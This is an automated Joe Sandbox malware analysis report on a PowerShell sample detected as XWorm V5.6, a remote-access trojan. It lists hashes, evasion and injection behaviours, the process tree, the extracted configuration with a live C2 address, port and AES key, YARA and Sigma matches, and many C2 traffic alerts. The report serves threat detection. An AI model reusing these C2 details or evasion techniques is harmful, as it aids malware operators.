Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NLXwvLjXPh.ps1

Overview

General Information

Sample name:NLXwvLjXPh.ps1
renamed because original name is a hash value
Original sample name:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859.ps1
Analysis ID:1577165
MD5:665d34b878bf82d6b6078c1a20cda896
SHA1:a1c03b8df6b114c5a9b557316868f06a2816f4c0
SHA256:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859
Tags:92-255-57-155ps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 4084 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 64 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 3744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 764 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x1d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x1dd8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1e68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x1c20:$cnc4: POST / HTTP/1.1
    Process Memory Space: RegSvcs.exe PID: 64JoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: RegSvcs.exe PID: 64MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x34d79:$s8: Win32_ComputerSystem
      • 0x34e51:$s8: Win32_ComputerSystem
      • 0x60a5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6161:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x61eb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x5f73:$cnc4: POST / HTTP/1.1

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", ProcessId: 3916, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1", ProcessId: 3916, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:28.448524+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:15:33.899749+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:15:45.767192+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:15:57.671967+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:15:58.442730+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:09.578020+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:21.484388+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:23.547003+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:23.737970+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:24.058420+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:24.200605+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:24.249443+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:25.203192+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:25.394199+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:27.293989+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:28.075972+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:28.266958+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:28.556971+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:28.746780+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.168287+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.359151+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.424415+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.550152+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.736027+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:29.829091+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:30.047995+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:30.164397+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:30.355330+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.212079+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.356071+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.476788+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.595467+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.723220+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:31.906559+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:32.128606+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:32.360490+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:32.444462+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.135361+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.326236+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.446302+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.517294+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.637143+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.828222+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:33.947863+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:34.008216+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:34.138848+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:35.439400+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:35.630348+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:35.793268+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:35.984120+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:36.077256+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:36.442149+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:36.778303+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:38.640407+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:38.767572+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:38.939562+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:39.130433+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:39.220304+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:41.203799+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:43.056545+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:43.247444+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:44.203380+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:44.394156+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:44.558782+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:44.585112+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:44.870997+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:45.065225+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:45.204642+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:45.388131+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:47.047441+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:47.237899+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:47.361006+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:48.829767+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:49.068332+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:50.452758+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:50.578931+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:50.763690+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:51.270231+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:51.731575+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:52.765459+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:53.137525+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:53.138802+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:53.267219+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:53.552143+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:54.377471+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:54.567651+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:55.861018+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:56.460091+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:56.901212+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:57.223265+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:58.044230+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:58.296589+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:58.724805+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:16:59.106524+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:00.254126+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:00.444796+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:00.565009+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:00.875375+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:00.994906+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:01.448153+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:01.567748+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:01.639169+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:01.727953+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:02.719202+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:02.952185+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:03.029984+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:03.143231+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:03.268126+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:03.512566+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:03.771577+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:04.443381+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:04.704070+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:04.895113+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:05.065666+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:05.094855+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:05.252728+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:05.349183+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:05.645241+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:06.438261+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:06.629264+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:08.390846+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:08.624097+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:08.702872+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:10.531625+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:10.722531+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:10.846279+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:11.132177+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:11.594488+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:12.527404+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:12.527753+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:12.641066+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:12.666990+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:12.858955+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:13.137554+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:13.606588+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:14.329044+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:14.503577+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:14.694434+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:14.885438+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:15.005307+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:15.252311+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:15.722900+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:15.956038+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:16.332447+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:18.796711+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:19.399329+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:20.266004+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:20.866720+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:21.141145+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:24.143750+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:24.376060+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:24.567006+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:24.686941+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:24.758192+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:25.388644+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:26.337618+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:26.528808+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:26.648790+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:27.460006+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:28.636119+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:28.826374+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:29.005410+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:29.017473+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:29.196404+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:29.288806+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:29.868567+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:30.160850+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:30.472926+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:30.659332+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:30.785671+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:32.515388+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:32.706363+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:32.826183+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:32.897453+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:33.208458+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:33.432768+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:34.375449+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:34.610544+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:34.800416+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:35.215702+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:35.406916+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:35.528667+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:35.721986+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:36.007975+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:36.198606+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:37.188412+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:37.348974+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:37.539654+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:37.631769+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:37.867963+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:38.567528+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:38.763720+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:40.109606+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:40.344360+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:40.955982+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:41.149459+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
